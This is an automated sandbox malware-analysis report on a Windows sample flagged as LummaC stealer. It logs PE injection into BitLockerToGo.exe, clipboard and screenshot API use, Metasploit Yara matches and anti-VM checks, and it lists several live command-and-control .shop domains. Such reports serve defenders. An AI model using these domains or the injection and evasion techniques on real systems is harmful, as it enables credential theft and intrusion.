Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.8:49706 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026F1530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_026F1530

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026F1530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_026F1530

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026E5380 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_026E5380

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F681D	2_2_026F681D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CC69D	2_2_026CC69D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CCC80	2_2_026CCC80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E9A49	2_2_026E9A49
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C5A40	2_2_026C5A40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E6206	2_2_026E6206
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026D22E6	2_2_026D22E6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EA2E3	2_2_026EA2E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EBADA	2_2_026EBADA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EE2AC	2_2_026EE2AC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026D1B6E	2_2_026D1B6E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E0360	2_2_026E0360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E4B70	2_2_026E4B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E7B30	2_2_026E7B30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C63E0	2_2_026C63E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F23DD	2_2_026F23DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E23B5	2_2_026E23B5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C7B80	2_2_026C7B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E5B9D	2_2_026E5B9D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CDB90	2_2_026CDB90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FE390	2_2_026FE390
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C8870	2_2_026C8870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E285E	2_2_026E285E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026ED056	2_2_026ED056
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026DE850	2_2_026DE850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FB050	2_2_026FB050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F0035	2_2_026F0035
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C1000	2_2_026C1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C9810	2_2_026C9810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EE8D7	2_2_026EE8D7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026DF8B7	2_2_026DF8B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FE080	2_2_026FE080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E0970	2_2_026E0970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026D5172	2_2_026D5172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F6150	2_2_026F6150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026ED9EB	2_2_026ED9EB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FF9E0	2_2_026FF9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FD9AD	2_2_026FD9AD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EC9B7	2_2_026EC9B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E11B0	2_2_026E11B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C8190	2_2_026C8190
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E866E	2_2_026E866E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EAE2B	2_2_026EAE2B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F06F7	2_2_026F06F7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FF6F0	2_2_026FF6F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026DE6C0	2_2_026DE6C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F0EAE	2_2_026F0EAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C6E80	2_2_026C6E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F6E82	2_2_026F6E82
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C2FE0	2_2_026C2FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F57E0	2_2_026F57E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026D8FD5	2_2_026D8FD5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C4FD0	2_2_026C4FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E37A0	2_2_026E37A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EEF89	2_2_026EEF89
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FDF90	2_2_026FDF90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FDC70	2_2_026FDC70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026C4C20	2_2_026C4C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026DA4EA	2_2_026DA4EA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EF4C7	2_2_026EF4C7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CD4D0	2_2_026CD4D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F5CD0	2_2_026F5CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CF578	2_2_026CF578
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F3D5E	2_2_026F3D5E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026EC521	2_2_026EC521
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E8535	2_2_026E8535
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E0D30	2_2_026E0D30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026F1530	2_2_026F1530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026CA500	2_2_026CA500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026DCDED	2_2_026DCDED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026FD5DE	2_2_026FD5DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_026E1DB5	2_2_026E1DB5

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 026CAA20 appears 134 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 026CA310 appears 58 times

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1715511841.00000000013D1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1722084290.0000000002014000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Binary string: bindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlock116415321826934814453125582076609134674072265625reflect.StructOf: field reflect.Value.SetComplexreflect.Value.UnsafeAddrx509: malformed validityexec: Stdout already setjson: unsupported type: Invalid Semantic VersionSetConsoleCursorPositionAllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceGetWindowThreadProcessIdinvalid pattern syntax: flate: maxBits too largeidna: disallowed rune %Uaddress string too shortresource length too longunpacking Question.Class^[a-zA-Z_][a-zA-Z0-9_]*$unable to resolve %s: %vunable to resolve %v: %qgoogle.protobuf.Duration\Device\NamedPipe\cygwinAsia Pacific (Hong Kong)Asia Pacific (Hyderabad)Asia Pacific (Singapore)Asia Pacific (Melbourne)athena.ap-east-1.api.awsathena.ca-west-1.api.awsathena.eu-west-1.api.awsathena.eu-west-2.api.awsathena.eu-west-3.api.awsathena.sa-east-1.api.awsathena.us-east-1.api.awsathena.us-east-2.api.awsathena.us-west-1.api.awsathena.us-west-2.api.awscloudfront.amazonaws.comaos.ca-central-1.api.awsaos.eu-central-1.api.awsaos.eu-central-2.api.awsaos.il-central-1.api.awsaos.me-central-1.api.awslambda.ap-east-1.api.awslambda.ca-west-1.api.awslambda.eu-west-1.api.awslambda.eu-west-2.api.awslambda.eu-west-3.api.awslambda.sa-east-1.api.awslambda.us-east-1.api.awslambda.us-east-2.api.awslambda.us-west-1.api.awslambda.us-west-2.api.awsrekognition.ca-central-1budgets.amazonaws.com.cnroute53.amazonaws.com.cnacm.{region}.{dnsSuffix}dms.{region}.{dnsSuffix}ec2.{region}.{dnsSuffix}eks.{region}.{dnsSuffix}iam.us-gov.amazonaws.compi.us-gov-east-1.api.awspi.us-gov-west-1.api.awsrds.{region}.{dnsSuffix}sqs.{region}.{dnsSuffix}ssm.{region}.{dnsSuffix}sts.{region}.{dnsSuffix}streamSafe was not resetmismatching enum lengthsGODEBUG sys/cpu: value "", required CPU feature

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@11/3

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026F65E0 CoCreateInstance,

2_2_026F65E0

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	String found in binary or memory: net/addrselect.go
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static file information: File size 32150017 > 1048576

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x47a800
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x57f400

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1722084290.0000000002014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1722084290.0000000002014000.00000004.00001000.00020000.00000000.sdmp

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026F504B push ss; retf

2_2_026F504F

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3800	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3800	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000002.1715700490.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: BitLockerToGo.exe, 00000002.00000003.1725565582.0000000002815000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748418926.0000000002815000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.0000000002815000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002815000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_026FC800 LdrInitializeThunk,

2_2_026FC800

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26C0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26C0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe, 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nippydxmnwquo.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 595008	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26C0000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26C1000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2700000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2703000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2712000	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
